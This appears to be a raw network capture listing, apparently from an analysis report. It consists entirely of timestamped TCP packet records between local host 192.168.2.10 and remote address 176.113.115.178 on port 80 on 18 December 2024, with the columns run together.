                                                        Dec 18, 2024 14:08:29.347839117 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.347903967 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.348772049 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.348838091 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.348926067 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.349786043 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.349858046 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.349874973 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.350027084 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.350814104 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.350985050 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.351850033 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.351923943 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.352006912 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.352164984 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.352901936 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.353075981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.353163004 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.353972912 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.354060888 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.354949951 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.355027914 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.355068922 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.355173111 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.355950117 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.356147051 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.357012987 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.357120991 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.357248068 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.357335091 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.358088970 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.358172894 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.358787060 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.359049082 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.359195948 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.360086918 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.360162973 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.360199928 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.360373974 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.383712053 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.383795977 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.384257078 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.384366989 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.384390116 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.384433985 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.385379076 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.385409117 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.385721922 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.386482954 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.427696943 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.502028942 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.502079964 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.502397060 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.502674103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.502993107 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.503005028 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.503077984 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.503806114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.503868103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.504034996 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.504785061 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.504842043 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.505179882 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.505677938 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.505834103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.505855083 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.508331060 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.508349895 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.508395910 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.508424997 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.508438110 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.508486986 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.509248972 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.509373903 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.509445906 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.510010004 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.510226965 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.510262966 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.511255980 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.511267900 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.511331081 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.512082100 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.512149096 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.512242079 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.513010979 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.513096094 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.513220072 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.514081001 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.514142036 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.514168978 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.515121937 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.515202999 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.515208006 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.516082048 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.516094923 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.516164064 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.517081976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.517123938 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.517246962 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.518063068 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.518167019 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.518318892 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.519052029 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.519222975 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.519243002 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.520176888 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.520198107 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.520272970 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.521164894 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.521292925 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.521358013 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.522234917 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.522370100 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.522393942 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.523190975 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.523205996 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.523300886 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.524279118 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.524391890 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.524570942 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.525532007 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.525667906 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.525769949 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.526423931 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.526477098 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.526493073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.527393103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.527406931 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.527446032 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.528321981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.528409004 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.528496027 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.529432058 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.529536963 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.529695034 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.530505896 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.530563116 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.530581951 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.531785965 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.531908035 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.532013893 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.532486916 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.532541037 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.532610893 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.533516884 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.533670902 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.533716917 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.534562111 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.534658909 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.534740925 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.535588980 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.535681963 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.535718918 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.536663055 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.536791086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.536806107 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.537652016 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.537698030 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.537765980 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.538696051 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.538762093 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.538773060 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.539700985 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.539808989 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.539835930 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.540832043 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.540844917 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.540910959 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.541809082 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.541887999 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.541892052 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.542892933 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.542963028 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.542989016 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.543899059 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.543994904 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.544006109 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.544904947 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.545037031 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.545228004 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.546030998 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.546102047 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.546113968 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.546986103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.547178030 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.547204971 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.547977924 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.548099995 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.548204899 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.549002886 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.549107075 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.549149990 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.551695108 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.551717043 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.551729918 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.551742077 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.551801920 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.551821947 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.552680969 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.552695036 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.552783012 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.576667070 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.576683998 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.576854944 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.577125072 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.577208996 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.577236891 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.578145981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.578239918 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.578275919 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.579138994 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.579348087 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.693882942 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.693970919 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.694051027 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.694300890 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.694639921 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.694657087 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.694698095 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.696356058 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.696362019 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.696412086 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.697038889 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.697060108 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.697112083 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.697844982 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.697875977 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.697889090 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.698956966 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.699094057 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.699106932 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.699743986 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.699862957 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.699990034 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.700854063 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.700944901 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.701086044 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.701921940 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.701952934 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.702013016 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.702892065 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.702934027 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.703033924 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.703995943 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.704034090 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.704056025 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.705671072 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.705756903 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.706298113 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.706681967 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.706748009 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.706779003 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.706986904 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.707089901 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.707106113 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.708146095 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.708281040 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.708343029 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.709301949 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.709367037 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.709459066 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.710220098 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.710236073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.710325956 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.711366892 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.711383104 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.711536884 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.712291956 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.712307930 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.712347984 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.713901043 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.713937998 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.713967085 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.714603901 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.714736938 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.714754105 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.715409994 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.715423107 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.715457916 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.716463089 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.716543913 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.716578960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.717453957 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.717477083 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.717647076 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.718333006 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.718427896 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.718466043 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.719460964 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.719538927 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.719589949 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.720623016 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.720644951 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.720694065 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.721416950 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.721479893 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.721708059 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.722474098 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.722537994 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.722788095 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.723669052 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.723740101 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.723803043 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.724627972 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.724701881 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.724817991 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.725683928 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.725699902 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.725775957 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.726720095 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.726768970 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.726815939 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.727715969 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.727809906 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.727886915 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.728792906 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.728888988 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.728940964 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.729684114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.729767084 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.729942083 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.731105089 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.731115103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.731223106 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.731993914 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.732007980 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.732110977 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.732992887 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.733007908 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.733078003 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.733891964 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.733998060 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.734021902 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.736013889 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.736181021 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.736198902 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.736499071 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.736511946 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.736556053 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.736923933 CET8049746176.113.115.178192.168.2.10
